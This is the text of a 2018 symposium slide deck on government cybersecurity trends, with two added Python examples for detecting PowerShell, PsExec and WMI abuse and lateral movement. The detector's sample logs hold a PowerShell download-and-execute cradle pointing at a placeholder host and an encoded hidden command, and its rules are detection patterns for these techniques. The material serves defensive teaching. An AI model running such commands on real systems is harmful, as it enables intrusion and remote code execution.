
The better the question. The better the answer. The better the world works.

Cybersecurity: Trends and Challenges

21st Century Government – City Next Antigua 2018 Symposium

Page 2

“I get hired to hack into computers now and sometimes it's actually easier than it was years ago.”

-- Kevin Mitnick

Page 3

The BEST hacking tool today!

Page 4

Things are not always what they seem

Page 5

Fraud through technology – real example

Original Invoice

Fraudulent Invoice

Page 6

Some breaches you may know

• Equifax – 145 million people, July 2017

• NSA spy tools leaked to internet … April 2017

• Yahoo – 1B accounts hacked, 2013/2014/2016/2017

• 50TB of NSA data stolen over 20 years…

• Cryptocurrency miner … compromised (60M), Dec 2017

• Uber – 57M customer records breached… 2016

• SWIFT hack – 81M missing (attempted 850M) … 2016

• Thousands of voter roll records were accessed, Sep 2016

• Ransomware/WannaCry – 300,000 computers… May 2016

• Ransomware infects 400,000 computers, 2017

Page 7

Attacks on Industrial Control Systems – Operational Technology

Shamoon

Flame

Page 8

The cyber threat landscape

ENISA Threat Landscape Report 2017

Page 9

Why

► Attackers are increasingly making use of tools already installed on targeted computers, like PowerShell, PsExec, or WMI

► Minimizes the risk of an attack being blocked

► Less chance of being detected by traditional security tools

► Running simple scripts and shellcode directly in memory

► Hide in plain sight

► Clickless infections
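As an added, defender-side illustration of this slide (not code from the deck or its presenter): a small Python rule set that scans constructed process-creation log lines for the living-off-the-land patterns named above, namely PowerShell launched with hidden or encoded arguments or a download-and-execute cradle, the PsExec service, and WMI remote process creation. The log format, field names, parent-process list and rules are assumptions.

```python
"""Flag living-off-the-land process launches (PowerShell, PsExec, WMI) in
constructed process-creation log lines. Format and rules are assumptions."""
import re

# Constructed sample lines in a simplified key=value process-creation format
# (field names loosely modelled on Sysmon Event ID 1; assumption).
SAMPLE_LOGS = [
    "host=WS01 parent=outlook.exe image=powershell.exe cmd=powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=",
    "host=WS01 parent=explorer.exe image=powershell.exe cmd=powershell.exe -File C:\\scripts\\backup.ps1",
    "host=SRV02 parent=services.exe image=PSEXESVC.exe cmd=PSEXESVC.exe",
    "host=WS03 parent=cmd.exe image=wmic.exe cmd=wmic.exe /node:SRV02 process call create \"cmd /c whoami\"",
    "host=WS03 parent=explorer.exe image=notepad.exe cmd=notepad.exe notes.txt",
    "host=WS04 parent=winword.exe image=powershell.exe cmd=powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
]

# Parents that should rarely launch administrative tooling (assumption).
OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe"}

# Each rule: (name, image pattern, command-line pattern). Constructed rules
# aimed at in-memory script execution and remote execution via PsExec/WMI.
RULES = [
    ("powershell_encoded_or_hidden", r"(?i)powershell(\.exe)?$",
     r"(?i)(-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|-w(indowstyle)?\s+hidden|-nop\b)"),
    ("powershell_download_cradle", r"(?i)powershell(\.exe)?$",
     r"(?i)(IEX|Invoke-Expression).*(DownloadString|DownloadFile|WebClient)"),
    ("psexec_service", r"(?i)psexesvc(\.exe)?$", r".*"),
    ("wmi_remote_process", r"(?i)wmic(\.exe)?$", r"(?i)process\s+call\s+create"),
]

LINE_RE = re.compile(r"host=(\S+) parent=(\S+) image=(\S+) cmd=(.*)")

def parse(line):
    """Split one log line into its fields; None if the line is malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return dict(zip(("host", "parent", "image", "cmd"), m.groups()))

def evaluate(event):
    """Return (rule, severity) hits; an Office parent raises severity."""
    hits = []
    for name, image_re, cmd_re in RULES:
        if re.search(image_re, event["image"]) and re.search(cmd_re, event["cmd"]):
            sev = "high" if event["parent"].lower() in OFFICE_PARENTS else "medium"
            hits.append((name, sev))
    return hits

def scan(lines):
    """Evaluate every line and return (host, rule, severity) alerts."""
    return [(ev["host"], rule, sev)
            for ev in map(parse, lines) if ev
            for rule, sev in evaluate(ev)]
```

The unsigned backup script and Notepad launch produce no alert, which is the point of keying on arguments and parent process rather than on the binary name alone.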

Page 10

Complexity of threats

Unsophisticated attackers (script kiddies): you are on the internet and have a vulnerability.

Sophisticated attackers (hackers): you are on the internet and have information of value.

Corporate espionage (insider): a current or former employee seeks gain from selling intellectual property (IP).

State-sponsored attacks / advanced persistent threat (APT): you are targeted because of who you are, what you do, or the value of your IP.

Chart axes: risk versus attacker resource and sophistication. Attacker motivations shown on the chart: experimentation, monetization, corporate espionage, state-sponsored espionage.

APT life cycle (diagram): initial exploitation, command and control, privilege escalation, intelligence gathering, data exfiltration.

Page 11

Closer to home

• Trinidad news media group website hacked … 2016

• Thousands of credit cards hacked (Bahamas)… 2013

• Government Minister SM account hacked … 2016

• Four state bodies hacked in two weeks (Jamaica)… Feb 2016

• Militant group hacks Gov’t of St. Vincent’s website … 2015

• Bank account thefts over Christmas period, 2015

• Regional telecom provider hacked … 2013

• Six government websites compromised, 2015

Page 12

National cybersecurity posture – technologies

Source: 2016 Cybersecurity Report, OAS

Page 13

Source: 2016 Cybersecurity Report, OAS

Page 14

The cybersecurity framework


National Cybersecurity Strategy (SAMPLE)

• PROTECT CRITICAL INFRASTRUCTURE

• DEVELOP HUMAN CAPITAL

• COOPERATE WITH PARTNERS

• DEFEND & RESPOND

• IMPROVE THREAT AWARENESS

• DEVELOP TECHNICAL CAPABILITIES


Framework dimensions (diagram): FOCUS, POLICY, ENTITY, SECTOR, GOVERNANCE, STANDARDS, INFORMATION

Entities:

• Entity 1

• Entity 2

• Entity

• Etc.

Sectors:

• Health

• Transport

• Oil & Gas

• Financial

• Etc.

Governance bodies:

• Information Assurance Technical Forums

• National Incident Response Working Group

• National Awareness & Capability Building Committee

• National Policy Working Group

Public Sector Cybersecurity Strategy (SAMPLE)

Page 16

Mission: Comprehensive operational anomaly detection throughout the kill chain

Threat detection mapped onto attack (kill) chain progression:

Background research – no detection listed

Initial attack – Detection that email is malicious

Establish foothold – Detection that communication with attacker exists

Enable persistence – Detection that programs or services are malicious

Enterprise recon – Detection that reconnaissance behavior exists

Move laterally – Detection that traversal behavior exists

Escalate privilege – Detection that privilege escalation behavior exists

Gather and encrypt data – Detection that staging behavior exists

Steal data – Detection that exfiltration behavior exists

Page 17

What the next generation of tools look like

Diagram labels: Vendor Network, Internal reconnaissance, Lateral Movement, HVA Interconnect, HVA devices

► Self-learning models on each pair of communicating nodes

► Use cases covered:

  ► Lateral detection

  ► Reconnaissance detection

  ► Data Staging detection

► Can be tuned to be sensitive to most pressing threats including:

  ► High Value Assets (HVA)

  ► Insider threat

  ► External attackers

  ► Operational Technology

  ► IoT monitoring

  ► 3rd party vectors

  ► POS, etc.

Highlights

‘PathScan’ detects attacks across interconnected networks
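An added example (not PathScan's code or the presenter's) of the per-pair idea on this slide: learn the set of node pairs that communicate during a quiet window, then flag pairs that appear only in the detection window and sources that fan out to several new destinations, raising severity for pairs that reach assumed high-value assets. Addresses, thresholds and flow records are constructed.

```python
"""Per-pair communication baseline for lateral-movement and reconnaissance
detection. Illustration only, not PathScan's method; addresses, thresholds
and flows are constructed assumptions."""
from collections import defaultdict

HVA = {"10.0.5.10", "10.0.5.11"}  # constructed high-value asset addresses
FANOUT_THRESHOLD = 3              # new destinations per source before alerting

# Constructed flow records (src, dst) from a learning window in which
# workstations 10.0.1.x only talk to servers, never to each other.
BASELINE_FLOWS = [
    ("10.0.1.20", "10.0.5.10"), ("10.0.1.21", "10.0.5.10"),
    ("10.0.1.20", "10.0.2.5"), ("10.0.1.22", "10.0.2.5"),
    ("10.0.1.21", "10.0.2.6"),
]
# Constructed detection window: 10.0.1.22 starts probing peers and an HVA.
WINDOW_FLOWS = [
    ("10.0.1.20", "10.0.5.10"),  # known pair, nothing to report
    ("10.0.1.22", "10.0.1.20"),  # new workstation-to-workstation pair
    ("10.0.1.22", "10.0.1.21"),  # new pair
    ("10.0.1.22", "10.0.1.23"),  # new pair: fan-out threshold reached here
    ("10.0.1.22", "10.0.5.11"),  # new pair toward a high-value asset
]

def learn_pairs(flows):
    """Baseline model: the set of (src, dst) pairs seen while learning."""
    return {(src, dst) for src, dst in flows}

def score_window(baseline, flows):
    """Flag pairs absent from the baseline (lateral movement candidates)
    and sources whose count of new destinations suggests reconnaissance."""
    alerts = []
    new_dsts = defaultdict(set)
    for src, dst in flows:
        if (src, dst) in baseline:
            continue
        new_dsts[src].add(dst)
        severity = "high" if dst in HVA else "low"
        alerts.append(("new_pair", src, dst, severity))
    for src, dsts in new_dsts.items():
        if len(dsts) >= FANOUT_THRESHOLD:
            alerts.append(("fan_out", src, f"{len(dsts)} new destinations", "medium"))
    return alerts

def detect(baseline_flows=BASELINE_FLOWS, window_flows=WINDOW_FLOWS):
    """Learn from one window and score the next; returns the alert list."""
    return score_window(learn_pairs(baseline_flows), window_flows)
```

A real deployment would keep learning (new pairs that recur without incident join the baseline) and score per-pair volume and timing as well, which is where the "self-learning model" on the slide goes beyond this set lookup.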

Page 18

PathScan visual and demonstration

Questions/Comments

Page 20

“By changing nothing, nothing changes”

-Tony Robbins